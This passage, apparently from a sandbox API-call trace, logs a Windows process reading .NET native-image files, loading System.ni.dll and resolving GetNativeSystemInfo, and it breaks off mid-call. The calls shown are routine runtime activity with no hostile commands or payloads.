0x13dc [0059.577] GetCurrentThreadId () returned 0x13dc [0059.577] GetCurrentThreadId () returned 0x13dc [0059.577] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0059.577] GetCurrentThreadId () returned 0x13dc [0059.577] GetCurrentThreadId () returned 0x13dc [0059.577] GetCurrentThreadId () returned 0x13dc [0059.577] SetEvent (hEvent=0x20c) returned 1 [0059.577] ReadFile (in: hFile=0x390, lpBuffer=0xb99c8, nNumberOfBytesToRead=0xfff, lpNumberOfBytesRead=0x13fbcc8, lpOverlapped=0x0 | out: lpBuffer=0xb99c8*, lpNumberOfBytesRead=0x13fbcc8*=0xfff, lpOverlapped=0x0) returned 1 [0059.579] GetCurrentThreadId () returned 0x13dc [0059.580] GetCurrentThreadId () returned 0x13dc [0059.580] GetCurrentThreadId () returned 0x13dc [0059.580] GetCurrentThreadId () returned 0x13dc [0059.580] GetCurrentThreadId () returned 0x13dc [0059.580] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0059.580] GetCurrentThreadId () returned 0x13dc [0059.580] GetCurrentThreadId () returned 0x13dc [0059.580] GetCurrentThreadId () returned 0x13dc [0059.580] SetEvent (hEvent=0x20c) returned 1 [0059.580] ReadFile (in: hFile=0x390, lpBuffer=0xb79c0, nNumberOfBytesToRead=0x17f7, lpNumberOfBytesRead=0x13fbcb0, lpOverlapped=0x0 | out: lpBuffer=0xb79c0*, lpNumberOfBytesRead=0x13fbcb0*=0x17f7, lpOverlapped=0x0) returned 1 [0059.582] GetCurrentThreadId () returned 0x13dc [0059.582] GetCurrentThreadId () returned 0x13dc [0059.582] GetCurrentThreadId () returned 0x13dc [0059.582] GetCurrentThreadId () returned 0x13dc [0059.582] GetCurrentThreadId () returned 0x13dc [0059.582] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0059.582] GetCurrentThreadId () returned 0x13dc [0059.582] GetCurrentThreadId () returned 0x13dc [0059.582] GetCurrentThreadId () returned 0x13dc [0059.582] SetEvent (hEvent=0x20c) returned 1 [0059.582] ReadFile (in: hFile=0x390, lpBuffer=0xb79c0, nNumberOfBytesToRead=0x1001, lpNumberOfBytesRead=0x13fbcc0, lpOverlapped=0x0 | out: lpBuffer=0xb79c0*, lpNumberOfBytesRead=0x13fbcc0*=0x1001, lpOverlapped=0x0) returned 1 [0059.583] GetCurrentThreadId () returned 0x13dc [0059.583] GetCurrentThreadId () returned 0x13dc [0059.583] GetCurrentThreadId () returned 0x13dc [0059.584] GetCurrentThreadId () returned 0x13dc [0059.584] GetCurrentThreadId () returned 0x13dc [0059.584] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0059.584] GetCurrentThreadId () returned 0x13dc [0059.584] GetCurrentThreadId () returned 0x13dc [0059.584] GetCurrentThreadId () returned 0x13dc [0059.584] SetEvent (hEvent=0x20c) returned 1 [0059.584] ReadFile (in: hFile=0x390, lpBuffer=0xb79c0, nNumberOfBytesToRead=0x1002, lpNumberOfBytesRead=0x13fbcc0, lpOverlapped=0x0 | out: lpBuffer=0xb79c0*, lpNumberOfBytesRead=0x13fbcc0*=0x1002, lpOverlapped=0x0) returned 1 [0059.585] GetCurrentThreadId () returned 0x13dc [0059.585] GetCurrentThreadId () returned 0x13dc [0059.585] GetCurrentThreadId () returned 0x13dc [0059.585] GetCurrentThreadId () returned 0x13dc [0059.586] GetCurrentThreadId () returned 0x13dc [0059.586] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0059.586] GetCurrentThreadId () returned 0x13dc [0059.586] GetCurrentThreadId () returned 0x13dc [0059.586] GetCurrentThreadId () returned 0x13dc [0059.586] SetEvent (hEvent=0x20c) returned 1 [0059.586] ReadFile (in: hFile=0x390, lpBuffer=0xbef10, nNumberOfBytesToRead=0x1f28, lpNumberOfBytesRead=0x13fbcb4, lpOverlapped=0x0 | out: lpBuffer=0xbef10*, lpNumberOfBytesRead=0x13fbcb4*=0x1f28, lpOverlapped=0x0) returned 1 [0059.588] GetCurrentThreadId () returned 0x13dc [0059.588] ResetEvent (hEvent=0x200) returned 1 [0059.588] GetCurrentThreadId () returned 0x13dc [0059.588] GetCurrentThreadId () returned 0x13dc [0059.588] GetCurrentThreadId () returned 0x13dc [0059.588] GetCurrentThreadId () returned 0x13dc [0059.588] ResetEvent (hEvent=0x200) returned 1 [0059.588] GetCurrentThreadId () returned 0x13dc [0059.589] GetCurrentThreadId () returned 0x13dc [0059.589] SetEvent (hEvent=0x20c) returned 1 [0059.589] SetEvent (hEvent=0x200) returned 1 [0059.589] CloseHandle (hObject=0x390) returned 1 [0059.633] SysReAllocStringLen (in: pbstr=0x13fbcac*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13fbcac*="kernel32.dll") returned 1 [0059.633] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0059.633] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0059.636] GetProcAddress (hModule=0x772d0000, lpProcName="GetNativeSystemInfo") returned 0x772e5130 [0059.641] CreateFileW (lpFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\02d3b6022cc1ee466eb660dedcff59aa\\System.Windows.Forms.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\02d3b6022cc1ee466eb660dedcff59aa\\system.windows.forms.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x394 [0059.642] GetLastError () returned 0x0 [0059.642] SysReAllocStringLen (in: pbstr=0x13fb7d0*=0x0, psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\02d3b6022cc1ee466eb660dedcff59aa\\System.Windows.Forms.ni.dll.aux", len=0x84 | out: pbstr=0x13fb7d0*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\02d3b6022cc1ee466eb660dedcff59aa\\System.Windows.Forms.ni.dll.aux") returned 1 [0059.642] GetThreadLocale () returned 0x409 [0059.642] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\02d3b6022cc1ee466eb660dedcff59aa\\System.Windows.Forms.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0059.643] GetThreadLocale () returned 0x409 [0059.643] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\02d3b6022cc1ee466eb660dedcff59aa\\System.Windows.Forms.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0059.643] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\02d3b6022cc1ee466eb660dedcff59aa\\System.Windows.Forms.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x13fb554, lpFilePart=0x13fb550 | out: lpBuffer="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\02d3b6022cc1ee466eb660dedcff59aa\\System.Windows.Forms.ni.dll.aux", lpFilePart=0x13fb550*="System.Windows.Forms.ni.dll.aux") returned 0x84 [0059.643] SysReAllocStringLen (in: pbstr=0x13fb7d0*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\02d3b6022cc1ee466eb660dedcff59aa\\System.Windows.Forms.ni.dll.aux", psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\02d3b6022cc1ee466eb660dedcff59aa\\System.Windows.Forms.ni.dll.aux", len=0x84 | out: pbstr=0x13fb7d0*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\02d3b6022cc1ee466eb660dedcff59aa\\System.Windows.Forms.ni.dll.aux") returned 1 [0059.643] SysReAllocStringLen (in: pbstr=0x13fb780*=0x0, psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\02d3b6022cc1ee466eb660dedcff59aa\\System.Windows.Forms.ni.dll.aux", len=0x84 | out: pbstr=0x13fb780*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\02d3b6022cc1ee466eb660dedcff59aa\\System.Windows.Forms.ni.dll.aux") returned 1 [0059.643] CharLowerBuffW (in: lpsz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\02d3b6022cc1ee466eb660dedcff59aa\\System.Windows.Forms.ni.dll.aux", cchLength=0x84 | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\02d3b6022cc1ee466eb660dedcff59aa\\system.windows.forms.ni.dll.aux") returned 0x84 [0059.643] SysReAllocStringLen (in: pbstr=0x13fb7d0*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\02d3b6022cc1ee466eb660dedcff59aa\\System.Windows.Forms.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\02d3b6022cc1ee466eb660dedcff59aa\\system.windows.forms.ni.dll.aux", len=0x84 | out: pbstr=0x13fb7d0*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\02d3b6022cc1ee466eb660dedcff59aa\\system.windows.forms.ni.dll.aux") returned 1 [0059.643] SetLastError (dwErrCode=0x0) [0059.643] GetCurrentThreadId () returned 0x13dc [0059.643] GetCurrentThreadId () returned 0x13dc [0059.643] GetCurrentThreadId () returned 0x13dc [0059.643] GetCurrentThreadId () returned 0x13dc [0059.643] GetCurrentThreadId () returned 0x13dc [0059.643] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0059.643] GetCurrentThreadId () returned 0x13dc [0059.643] GetCurrentThreadId () returned 0x13dc [0059.643] GetCurrentThreadId () returned 0x13dc [0059.643] SetEvent (hEvent=0x20c) returned 1 [0059.643] GetFileSize (in: hFile=0x394, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6b8 [0059.643] GetCurrentThreadId () returned 0x13dc [0059.643] GetCurrentThreadId () returned 0x13dc [0059.643] GetCurrentThreadId () returned 0x13dc [0059.643] GetCurrentThreadId () returned 0x13dc [0059.643] GetCurrentThreadId () returned 0x13dc [0059.643] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0059.643] GetCurrentThreadId () returned 0x13dc [0059.644] GetCurrentThreadId () returned 0x13dc [0059.644] GetCurrentThreadId () returned 0x13dc [0059.644] SetEvent (hEvent=0x20c) returned 1 [0059.644] ReadFile (in: hFile=0x394, lpBuffer=0xb9418, nNumberOfBytesToRead=0x6b8, lpNumberOfBytesRead=0x13fb884, lpOverlapped=0x0 | out: lpBuffer=0xb9418*, lpNumberOfBytesRead=0x13fb884*=0x6b8, lpOverlapped=0x0) returned 1 [0059.645] GetCurrentThreadId () returned 0x13dc [0059.645] ResetEvent (hEvent=0x200) returned 1 [0059.645] GetCurrentThreadId () returned 0x13dc [0059.645] GetCurrentThreadId () returned 0x13dc [0059.645] GetCurrentThreadId () returned 0x13dc [0059.645] GetCurrentThreadId () returned 0x13dc [0059.645] ResetEvent (hEvent=0x200) returned 1 [0059.645] GetCurrentThreadId () returned 0x13dc [0059.645] GetCurrentThreadId () returned 0x13dc [0059.645] SetEvent (hEvent=0x20c) returned 1 [0059.645] SetEvent (hEvent=0x200) returned 1 [0059.645] CloseHandle (hObject=0x394) returned 1 [0059.704] SysReAllocStringLen (in: pbstr=0x13fa69c*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13fa69c*="kernel32.dll") returned 1 [0059.705] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0059.705] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0059.707] GetProcAddress (hModule=0x772d0000, lpProcName="GetNativeSystemInfo") returned 0x772e5130 [0059.708] GetCurrentThreadId () returned 0x13dc [0059.708] ResetEvent (hEvent=0x200) returned 1 [0059.708] GetCurrentThreadId () returned 0x13dc [0059.708] GetCurrentThreadId () returned 0x13dc [0059.708] GetCurrentThreadId () returned 0x13dc [0059.708] GetCurrentThreadId () returned 0x13dc [0059.708] ResetEvent (hEvent=0x200) returned 1 [0059.708] GetCurrentThreadId () returned 0x13dc [0059.708] GetCurrentThreadId () returned 0x13dc [0059.708] SetEvent (hEvent=0x20c) returned 1 [0059.708] SetEvent (hEvent=0x200) returned 1 [0059.708] CloseHandle (hObject=0x394) returned 1 [0059.719] SysReAllocStringLen (in: pbstr=0x13fa69c*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13fa69c*="kernel32.dll") returned 1 [0059.720] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0059.720] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0059.722] GetProcAddress (hModule=0x772d0000, lpProcName="GetNativeSystemInfo") returned 0x772e5130 [0059.723] GetCurrentThreadId () returned 0x13dc [0059.723] ResetEvent (hEvent=0x200) returned 1 [0059.723] GetCurrentThreadId () returned 0x13dc [0059.723] GetCurrentThreadId () returned 0x13dc [0059.723] GetCurrentThreadId () returned 0x13dc [0059.723] GetCurrentThreadId () returned 0x13dc [0059.723] ResetEvent (hEvent=0x200) returned 1 [0059.723] GetCurrentThreadId () returned 0x13dc [0059.723] GetCurrentThreadId () returned 0x13dc [0059.723] SetEvent (hEvent=0x20c) returned 1 [0059.723] SetEvent (hEvent=0x200) returned 1 [0059.723] CloseHandle (hObject=0x394) returned 1 [0059.736] SysReAllocStringLen (in: pbstr=0x13fa6b4*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13fa6b4*="kernel32.dll") returned 1 [0059.736] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0059.737] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0059.739] GetProcAddress (hModule=0x772d0000, lpProcName="GetNativeSystemInfo") returned 0x772e5130 [0059.740] GetCurrentThreadId () returned 0x13dc [0059.740] ResetEvent (hEvent=0x200) returned 1 [0059.740] GetCurrentThreadId () returned 0x13dc [0059.740] GetCurrentThreadId () returned 0x13dc [0059.740] GetCurrentThreadId () returned 0x13dc [0059.740] GetCurrentThreadId () returned 0x13dc [0059.740] ResetEvent (hEvent=0x200) returned 1 [0059.740] GetCurrentThreadId () returned 0x13dc [0059.740] GetCurrentThreadId () returned 0x13dc [0059.740] SetEvent (hEvent=0x20c) returned 1 [0059.740] SetEvent (hEvent=0x200) returned 1 [0059.740] CloseHandle (hObject=0x394) returned 1 [0059.903] CreateFileW (lpFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\System.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\system.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0059.903] GetLastError () returned 0x0 [0059.903] SysReAllocStringLen (in: pbstr=0x13fae90*=0x0, psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\System.ni.dll.aux", len=0x68 | out: pbstr=0x13fae90*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\System.ni.dll.aux") returned 1 [0059.903] GetThreadLocale () returned 0x409 [0059.903] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\System.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0059.903] GetThreadLocale () returned 0x409 [0059.903] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\System.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0059.903] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\System.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x13fac14, lpFilePart=0x13fac10 | out: lpBuffer="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\System.ni.dll.aux", lpFilePart=0x13fac10*="System.ni.dll.aux") returned 0x68 [0059.903] SysReAllocStringLen (in: pbstr=0x13fae90*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\System.ni.dll.aux", psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\System.ni.dll.aux", len=0x68 | out: pbstr=0x13fae90*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\System.ni.dll.aux") returned 1 [0059.903] SysReAllocStringLen (in: pbstr=0x13fae40*=0x0, psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\System.ni.dll.aux", len=0x68 | out: pbstr=0x13fae40*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\System.ni.dll.aux") returned 1 [0059.903] CharLowerBuffW (in: lpsz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\System.ni.dll.aux", cchLength=0x68 | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\system.ni.dll.aux") returned 0x68 [0059.903] SysReAllocStringLen (in: pbstr=0x13fae90*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\System.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\system.ni.dll.aux", len=0x68 | out: pbstr=0x13fae90*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\system.ni.dll.aux") returned 1 [0059.904] SetLastError (dwErrCode=0x0) [0059.904] GetCurrentThreadId () returned 0x13dc [0059.904] GetCurrentThreadId () returned 0x13dc [0059.904] GetCurrentThreadId () returned 0x13dc [0059.904] GetCurrentThreadId () returned 0x13dc [0059.904] GetCurrentThreadId () returned 0x13dc [0059.904] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0059.904] GetCurrentThreadId () returned 0x13dc [0059.904] GetCurrentThreadId () returned 0x13dc [0059.904] GetCurrentThreadId () returned 0x13dc [0059.904] SetEvent (hEvent=0x20c) returned 1 [0059.904] GetFileSize (in: hFile=0x398, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x26c [0059.904] GetCurrentThreadId () returned 0x13dc [0059.904] GetCurrentThreadId () returned 0x13dc [0059.904] GetCurrentThreadId () returned 0x13dc [0059.904] GetCurrentThreadId () returned 0x13dc [0059.904] GetCurrentThreadId () returned 0x13dc [0059.904] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0059.904] GetCurrentThreadId () returned 0x13dc [0059.904] GetCurrentThreadId () returned 0x13dc [0059.904] GetCurrentThreadId () returned 0x13dc [0059.904] SetEvent (hEvent=0x20c) returned 1 [0059.904] ReadFile (in: hFile=0x398, lpBuffer=0xbc680, nNumberOfBytesToRead=0x26c, lpNumberOfBytesRead=0x13faf44, lpOverlapped=0x0 | out: lpBuffer=0xbc680*, lpNumberOfBytesRead=0x13faf44*=0x26c, lpOverlapped=0x0) returned 1 [0059.906] GetCurrentThreadId () returned 0x13dc [0059.906] ResetEvent (hEvent=0x200) returned 1 [0059.906] GetCurrentThreadId () returned 0x13dc [0059.906] GetCurrentThreadId () returned 0x13dc [0059.906] GetCurrentThreadId () returned 0x13dc [0059.906] GetCurrentThreadId () returned 0x13dc [0059.906] ResetEvent (hEvent=0x200) returned 1 [0059.906] GetCurrentThreadId () returned 0x13dc [0059.906] GetCurrentThreadId () returned 0x13dc [0059.906] SetEvent (hEvent=0x20c) returned 1 [0059.906] SetEvent (hEvent=0x200) returned 1 [0059.906] CloseHandle (hObject=0x398) returned 1 [0059.919] SysReAllocStringLen (in: pbstr=0x13f9d5c*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13f9d5c*="kernel32.dll") returned 1 [0059.919] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0059.920] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0059.922] GetProcAddress (hModule=0x772d0000, lpProcName="GetNativeSystemInfo") returned 0x772e5130 [0059.923] GetCurrentThreadId () returned 0x13dc [0059.923] ResetEvent (hEvent=0x200) returned 1 [0059.923] GetCurrentThreadId () returned 0x13dc [0059.923] GetCurrentThreadId () returned 0x13dc [0059.923] GetCurrentThreadId () returned 0x13dc [0059.923] GetCurrentThreadId () returned 0x13dc [0059.923] ResetEvent (hEvent=0x200) returned 1 [0059.923] GetCurrentThreadId () returned 0x13dc [0059.923] GetCurrentThreadId () returned 0x13dc [0059.923] SetEvent (hEvent=0x20c) returned 1 [0059.923] SetEvent (hEvent=0x200) returned 1 [0059.923] CloseHandle (hObject=0x398) returned 1 [0059.926] SysReAllocStringLen (in: pbstr=0x13fa44c*=0x0, psz="System.ni.dll", len=0xd | out: pbstr=0x13fa44c*="System.ni.dll") returned 1 [0059.926] CharLowerBuffW (in: lpsz="System.ni.dll", cchLength=0xd | out: lpsz="system.ni.dll") returned 0xd [0059.926] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System\\fcfb8bac8ea9a0e69d72c350b22f8e3f\\System.ni.dll", hFile=0x0, dwFlags=0x8) returned 0x71b70000 [0060.514] GetLastError () returned 0x0 [0060.515] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x772d0000 [0060.515] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77970000 [0060.515] SetLastError (dwErrCode=0x0) [0060.575] SysReAllocStringLen (in: pbstr=0x13fa6b4*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x13fa6b4*="kernel32.dll") returned 1 [0060.575] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0060.575] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0060.577] GetProcAddress (hModule=0x772d0000, lpProcName="GetNativeSystemInfo") returned 0x772e5130 [0060.578] GetCurrentThreadId () returned 0x13dc [0060.578] ResetEvent (hEvent=0x200) returned 1 [0060.578] GetCurrentThreadId () returned 0x13dc [0060.578] GetCurrentThreadId () returned 0x13dc [0060.578] GetCurrentThreadId () returned 0x13dc [0060.578] GetCurrentThreadId () returned 0x13dc [0060.578] ResetEvent (hEvent=0x200) returned 1 [0060.578] GetCurrentThreadId () returned 0x13dc [0060.578] GetCurrentThreadId () returned 0x13dc [0060.578] SetEvent (hEvent=0x20c) returned 1 [0060.579] SetEvent (hEvent=0x200) returned 1 [0060.579] CloseHandle (hObject=0x394) returned 1 [0060.582] CreateFileW (lpFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\5b307e2b9719b21749a8c73127ab5f45\\System.Drawing.ni.dll.aux" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\5b307e2b9719b21749a8c73127ab5f45\\system.drawing.ni.dll.aux"), dwDesiredAccess=0x80000000, dwShareMode=0x5, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x398 [0060.584] GetLastError () returned 0x0 [0060.584] SysReAllocStringLen (in: pbstr=0x13fae90*=0x0, psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\5b307e2b9719b21749a8c73127ab5f45\\System.Drawing.ni.dll.aux", len=0x78 | out: pbstr=0x13fae90*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\5b307e2b9719b21749a8c73127ab5f45\\System.Drawing.ni.dll.aux") returned 1 [0060.584] GetThreadLocale () returned 0x409 [0060.584] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\5b307e2b9719b21749a8c73127ab5f45\\System.Drawing.ni.dll.aux", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0060.584] GetThreadLocale () returned 0x409 [0060.584] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\5b307e2b9719b21749a8c73127ab5f45\\System.Drawing.ni.dll.aux", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0060.584] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\5b307e2b9719b21749a8c73127ab5f45\\System.Drawing.ni.dll.aux", nBufferLength=0x104, lpBuffer=0x13fac14, lpFilePart=0x13fac10 | out: lpBuffer="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\5b307e2b9719b21749a8c73127ab5f45\\System.Drawing.ni.dll.aux", lpFilePart=0x13fac10*="System.Drawing.ni.dll.aux") returned 0x78 [0060.584] SysReAllocStringLen (in: pbstr=0x13fae90*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\5b307e2b9719b21749a8c73127ab5f45\\System.Drawing.ni.dll.aux", psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\5b307e2b9719b21749a8c73127ab5f45\\System.Drawing.ni.dll.aux", len=0x78 | out: pbstr=0x13fae90*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\5b307e2b9719b21749a8c73127ab5f45\\System.Drawing.ni.dll.aux") returned 1 [0060.584] SysReAllocStringLen (in: pbstr=0x13fae40*=0x0, psz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\5b307e2b9719b21749a8c73127ab5f45\\System.Drawing.ni.dll.aux", len=0x78 | out: pbstr=0x13fae40*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\5b307e2b9719b21749a8c73127ab5f45\\System.Drawing.ni.dll.aux") returned 1 [0060.584] CharLowerBuffW (in: lpsz="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\5b307e2b9719b21749a8c73127ab5f45\\System.Drawing.ni.dll.aux", cchLength=0x78 | out: lpsz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\5b307e2b9719b21749a8c73127ab5f45\\system.drawing.ni.dll.aux") returned 0x78 [0060.584] SysReAllocStringLen (in: pbstr=0x13fae90*="C:\\WINDOWS\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\5b307e2b9719b21749a8c73127ab5f45\\System.Drawing.ni.dll.aux", psz="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\5b307e2b9719b21749a8c73127ab5f45\\system.drawing.ni.dll.aux", len=0x78 | out: pbstr=0x13fae90*="c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\5b307e2b9719b21749a8c73127ab5f45\\system.drawing.ni.dll.aux") returned 1 [0060.584] SetLastError (dwErrCode=0x0) [0060.585] GetCurrentThreadId () returned 0x13dc [0060.585] GetCurrentThreadId () returned 0x13dc [0060.585] GetCurrentThreadId () returned 0x13dc [0060.585] GetCurrentThreadId () returned 0x13dc [0060.585] GetCurrentThreadId () returned 0x13dc [0060.585] WaitForSingleObject (hHandle=0x200, dwMilliseconds=0xffffffff) returned 0x0 [0060.585] GetCurrentThreadId () returned 0x13dc [0060.585] GetCurrentThreadId () returned 0x13dc [0060.585] GetCurrentThreadId () returned 0x13dc [0060.585] SetEvent (hEvent=0x20c) returned 1 [0060.585] GetFileSize (in: hFile=0x398, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x248 [0060.585] GetCurrentThreadId () returned 0x13dc [0060.585] GetCurrentThreadId () returned 0x13dc [0060.585] GetCurrentThreadId () returned 0x13dc [0060.585] GetCurrentThreadId () returned 0x13dc [0060.585] GetCurrentThreadId () returned 0x13dc [0060.585] WaitForSingleObject (hHandle=0x200, 